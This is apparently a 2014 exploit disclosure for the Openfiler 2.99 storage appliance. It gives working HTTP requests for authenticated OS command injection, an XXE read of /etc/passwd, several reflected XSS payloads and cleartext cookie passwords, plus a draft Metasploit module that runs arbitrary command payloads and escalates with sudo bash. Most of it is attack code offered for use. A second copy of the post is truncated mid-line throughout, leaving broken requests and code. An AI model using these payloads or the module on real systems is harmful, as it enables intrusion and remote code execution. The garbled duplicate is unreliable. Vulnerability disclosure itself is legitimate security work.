#Tested on Openfiler NAS/SAN Appliance version 2.99
#Author: MiDoveteMollare
#Date: 10 June 2014
OS Command Injection (after authentication) #1
page: services_iscsi_target.html
paramenter: password
POST /admin/services_iscsi_target. html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/services_ iscsi_target.html
Content-Type: application/x-www-form- urlencoded
Content-Length: 83
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
username=AAA&addChapUser=Add& usertype=OutgoingUser& password=aaaa`touch%20/tmp/ test`
OS Command Injection (after authentication) #2
page: volumes_iscsi_targets.html
paramenter: newTgtName
POST /admin/volumes_iscsi_targets. html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/volumes_ iscsi_targets.html
Content-Type: application/x-www-form- urlencoded
Content-Length: 49
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
addNewTgt=Add&newTgtName=aaaa` touch%20/tmp/bbbbb`
Path Traversal (after authentication) :
page: system_ups.html
paramenter: TinkerAjaxArgs[]
POST /admin/system_ups.html HTTP/1.1
Host: IP:446
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+ xml,application/xml;q=0.9,*/*; q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Method: POST https://IP:446/admin/system_ ups.html HTTP/1.1
Content-Type: application/x-www-form- urlencoded; charset=UTF-8
Referer: https://IP:446/admin/system_ ups.html
Content-Length: 1180
Cookie: template=classic; lng=en; subNavIscsi-targetset=true;
subNavIscsi-lunmap=false; subNavIscsi-networkacl=false;
subNavIscsi-chapauth=false; usercookie=openfiler; passcookie=password
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
TinkerAjax=addUPSDevice& TinkerAjaxr=1402385862174& TinkerAjaxArgs[]=<!DOCTYPE% 20foo%20[<!ENTITY%20xxe915a7% 20SYSTEM%20"file%3a%2f%2f% 2fetc%2fpasswd">%20]><tinker- query>%0a%09<object><name> devicenameinput<%2fname>%0a% 09%09<value>APC%20-%20Back- UPS%20CS%20350%20USB%2fSerial% 26xxe915a7%3b<%2fvalue><% 2fobject>%0a%09<object><name> driverinput<%2fname>%0a%09%09< value>apcsmart<%2fvalue><% 2fobject>%0a%09%09<object>< name>upsstatusinput<%2fname>% 0a%09%09<value>1<%2fvalue><% 2fobject>%0a%09<object><name> confignameinput<%2fname>%0a% 09%09<value>ups0<%2fvalue><% 2fobject>%0a%09<object><name> portinput<%2fname>%0a%09%09< value>ttyS0<%2fvalue><% 2fobject>%0a%09<object><name> descinput<%2fname>%0a%09%09< value>dsa<%2fvalue><%2fobject> %0a%09<object><name> sorderinput<%2fname>%0a%09%09< value>0<%2fvalue><%2fobject>% 0a%09<object><name>cableinput< %2fname>%0a%09%09<value> simple<%2fvalue><%2fobject>% 0a%09<object><name> sdtypeinput<%2fname>%0a%09%09< value>0<%2fvalue><%2fobject>% 0a%09<object><name> configformsubm
itbutton<%2fname>%0a%09%09< value>Add%20Device<%2fvalue><% 2fobject>%0a%09<object><name> configformcancelbutton<% 2fname>%0a%09%09<value>Cancel< %2fvalue><%2fobject>%0a%0a<% 2ftinker-query>%0a
Passwords are saved in clear text in cookies:
HTTP/1.1 302 Found
Date: Mon, 09 Jun 2014 12:09:45 GMT
Server: Apache/2.2.9 (rPath)
X-Powered-By: PHP/5.2.11
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: usercookie=root; path=/; secure
Set-Cookie: passcookie=mypassword; path=/; secure
Cookies are not protected with HttpOnly:
HTTP/1.1 200 OK
Date: Sun, 02 Feb 2003 01:01:03 GMT
Server: Apache/2.2.9 (rPath)
X-Powered-By: PHP/5.2.11
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: language_code=it_IT; expires=Mon, 02-Feb-2004 01:01:04 GMT;
path=/
Set-Cookie: usercookie=openfiler; path=/; secure
Set-Cookie: passcookie=password; path=/; secure
Reflected XSS (before authentication):
Tested with Chrome, not working on Firefox.
https://IP:446/uptime.html? TinkerAjax=getUptime0fa3e]]% 3E%3Cscript%20xmlns=%22http:// www.w3.org/1999/xhtml%22%3E% 3C![CDATA[alert%28document. cookie%29]]%3E%3C/script%3E[[& TinkerAjaxr=1402315831409
Reflected XSS (after authentication):
page: services_ftp.html
parameters: MaxInstances, PassivePorts, Port, ServerName, TimeoutLogin,
TimeoutNoTransfer, TimeoutStalled,
POST /admin/services_ftp.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/services_ ftp.html
Content-Type: application/x-www-form- urlencoded
Content-Length: 262
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
TimeoutIdle=600&TimesGMT=on& ServerName=FTP+Server& TimeoutStalled=3600& MaxInstances="><script>alert( 1)</script>&TimeoutLogin=120& AllowForeignAddress=on& IdentLookups=on&Port=21& TimeoutNoTransfer=900& PassivePorts=55535+65534& ServerIdent=on&UseReverseDNS= on&applyftpsettings=Apply& reload=on
Reflected XSS (after authentication):
page: /admin/system.html
[parameterd: dns1 dns2
GET
/admin/system.html?dns1=1.1.1. 1"><script>alert(1)</script>& dns2=1.1.1.1&gateway=DHCP+ Controlled&netconf=Update& hostname=localhost.localdomain
Reflected XSS (after authentication):
page: /admin/volumes_iscsi_targets. html
parameter: newTgtName
POST /admin/volumes_iscsi_targets. html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/volumes_ iscsi_targets.html
Content-Type: application/x-www-form- urlencoded
Content-Length: 69
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
addNewTgt=Add&newTgtName=iqn. 2006-01.com.openfiler%3atsn">< script>alert(1)<%2fscript>
Reflected XSS with the User-Agent HTTP header in the following pages (after
authentication):
/account/language.html
/account/login.html
/account/password.html
/admin/account_groups.html
/admin/account_users.html
/admin/services.html
/admin/services_ftp.html
/admin/services_iscsi_target. html
/admin/services_rsync.html
/admin/system_clock.html
/admin/system_info.html
/admin/system_ups.html
/admin/volumes_editpartitions. html
/admin/volumes_iscsi_targets. html
e.g:
POST /account/language.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)--><script>alert( 1)</script>
PHP version leak:
https://IP:446/phpinfo.html
Draft of a Metasploit Module for command injection #2
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote:: HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Openfiler v2.99 Volumes Iscsi Command Execution",
'Description' => %q{
This module exploits a vulnerability in Openfiler v2.99
which could be abused to allow authenticated users to execute
arbitrary
code under the context of the 'openfiler' user.
},
'License' => MSF_LICENSE,
'Author' =>
[
' <MiDoveteMollare[at]gmail.com> ' # Discovery and exploit
],
'References' =>
[
['BID', 'TBD'],
['URL', 'TBD'],
['OSVDB', 'TBD'],
['EDB', 'TBD']
],
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
}
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'Privileged' => false,
'DisclosureDate' => "Jun 10 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(446),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'The username for the
application', 'openfiler']),
OptString.new('PASSWORD', [true, 'The password for the
application', 'password'])
], self.class)
end
def check
# retrieve software version from login page
vprint_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/'
})
if res and res.code == 200 and res.body =~ /<strong>Distro
Release: <\/strong> Openfiler [NE]SA 2\./
return Exploit::CheckCode::Appears
elsif res and res.code == 200 and res.body =~ /<title>Openfiler
Storage Control Center<\/title>/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable,
::Rex::ConnectionTimeout
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
def on_new_session(client)
client.shell_command_token(" sudo /bin/bash")
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
cmd = Rex::Text.uri_encode("#{ payload.raw}&")
# send payload
print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin
res = send_request_cgi({
'uri' => "/admin/volumes_iscsi_targets. html",
'method' => "POST",
'data' => "addNewTgt=Add&newTgtName= aaaa`#{cmd}`",
'cookie' => "usercookie=#{user}; passcookie=#{pass};",
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable,
::Rex::ConnectionTimeout
fail_with(Failure::Unknown, 'Connection failed')
end
if res and res.code == 302
print_good("#{peer} - Payload sent successfully")
elsif res and res.code == 302 and res.headers['Location'] =~
/\/index\.html\?redirect/
fail_with(Failure::NoAccess, 'Authentication failed')
else
fail_with(Failure::Unknown, 'Sending payload failed')
end
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
#Author: MiDoveteMollare
#Date: 10 June 2014
OS Command Injection (after authentication) #1
page: services_iscsi_target.html
paramenter: password
POST /admin/services_iscsi_target.
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/services_
Content-Type: application/x-www-form-
Content-Length: 83
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
username=AAA&addChapUser=Add&
OS Command Injection (after authentication) #2
page: volumes_iscsi_targets.html
paramenter: newTgtName
POST /admin/volumes_iscsi_targets.
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/volumes_
Content-Type: application/x-www-form-
Content-Length: 49
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
addNewTgt=Add&newTgtName=aaaa`
Path Traversal (after authentication) :
page: system_ups.html
paramenter: TinkerAjaxArgs[]
POST /admin/system_ups.html HTTP/1.1
Host: IP:446
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Method: POST https://IP:446/admin/system_
Content-Type: application/x-www-form-
Referer: https://IP:446/admin/system_
Content-Length: 1180
Cookie: template=classic; lng=en; subNavIscsi-targetset=true;
subNavIscsi-lunmap=false; subNavIscsi-networkacl=false;
subNavIscsi-chapauth=false; usercookie=openfiler; passcookie=password
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
TinkerAjax=addUPSDevice&
itbutton<%2fname>%0a%09%09<
Passwords are saved in clear text in cookies:
HTTP/1.1 302 Found
Date: Mon, 09 Jun 2014 12:09:45 GMT
Server: Apache/2.2.9 (rPath)
X-Powered-By: PHP/5.2.11
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: usercookie=root; path=/; secure
Set-Cookie: passcookie=mypassword; path=/; secure
Cookies are not protected with HttpOnly:
HTTP/1.1 200 OK
Date: Sun, 02 Feb 2003 01:01:03 GMT
Server: Apache/2.2.9 (rPath)
X-Powered-By: PHP/5.2.11
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: language_code=it_IT; expires=Mon, 02-Feb-2004 01:01:04 GMT;
path=/
Set-Cookie: usercookie=openfiler; path=/; secure
Set-Cookie: passcookie=password; path=/; secure
Reflected XSS (before authentication):
Tested with Chrome, not working on Firefox.
https://IP:446/uptime.html?
Reflected XSS (after authentication):
page: services_ftp.html
parameters: MaxInstances, PassivePorts, Port, ServerName, TimeoutLogin,
TimeoutNoTransfer, TimeoutStalled,
POST /admin/services_ftp.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/services_
Content-Type: application/x-www-form-
Content-Length: 262
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
TimeoutIdle=600&TimesGMT=on&
Reflected XSS (after authentication):
page: /admin/system.html
[parameterd: dns1 dns2
GET
/admin/system.html?dns1=1.1.1.
Reflected XSS (after authentication):
page: /admin/volumes_iscsi_targets.
parameter: newTgtName
POST /admin/volumes_iscsi_targets.
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/volumes_
Content-Type: application/x-www-form-
Content-Length: 69
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
addNewTgt=Add&newTgtName=iqn.
Reflected XSS with the User-Agent HTTP header in the following pages (after
authentication):
/account/language.html
/account/login.html
/account/password.html
/admin/account_groups.html
/admin/account_users.html
/admin/services.html
/admin/services_ftp.html
/admin/services_iscsi_target.
/admin/services_rsync.html
/admin/system_clock.html
/admin/system_info.html
/admin/system_ups.html
/admin/volumes_editpartitions.
/admin/volumes_iscsi_targets.
e.g:
POST /account/language.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)--><script>alert(
PHP version leak:
https://IP:446/phpinfo.html
Draft of a Metasploit Module for command injection #2
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::
def initialize(info={})
super(update_info(info,
'Name' => "Openfiler v2.99 Volumes Iscsi Command Execution",
'Description' => %q{
This module exploits a vulnerability in Openfiler v2.99
which could be abused to allow authenticated users to execute
arbitrary
code under the context of the 'openfiler' user.
},
'License' => MSF_LICENSE,
'Author' =>
[
' <MiDoveteMollare[at]gmail.com>
],
'References' =>
[
['BID', 'TBD'],
['URL', 'TBD'],
['OSVDB', 'TBD'],
['EDB', 'TBD']
],
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
}
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'Privileged' => false,
'DisclosureDate' => "Jun 10 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(446),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'The username for the
application', 'openfiler']),
OptString.new('PASSWORD', [true, 'The password for the
application', 'password'])
], self.class)
end
def check
# retrieve software version from login page
vprint_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/'
})
if res and res.code == 200 and res.body =~ /<strong>Distro
Release: <\/strong>
return Exploit::CheckCode::Appears
elsif res and res.code == 200 and res.body =~ /<title>Openfiler
Storage Control Center<\/title>/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable,
::Rex::ConnectionTimeout
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
def on_new_session(client)
client.shell_command_token("
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
cmd = Rex::Text.uri_encode("#{
# send payload
print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin
res = send_request_cgi({
'uri' => "/admin/volumes_iscsi_targets.
'method' => "POST",
'data' => "addNewTgt=Add&newTgtName=
'cookie' => "usercookie=#{user}; passcookie=#{pass};",
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable,
::Rex::ConnectionTimeout
fail_with(Failure::Unknown, 'Connection failed')
end
if res and res.code == 302
print_good("#{peer} - Payload sent successfully")
elsif res and res.code == 302 and res.headers['Location'] =~
/\/index\.html\?redirect/
fail_with(Failure::NoAccess, 'Authentication failed')
else
fail_with(Failure::Unknown, 'Sending payload failed')
end
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information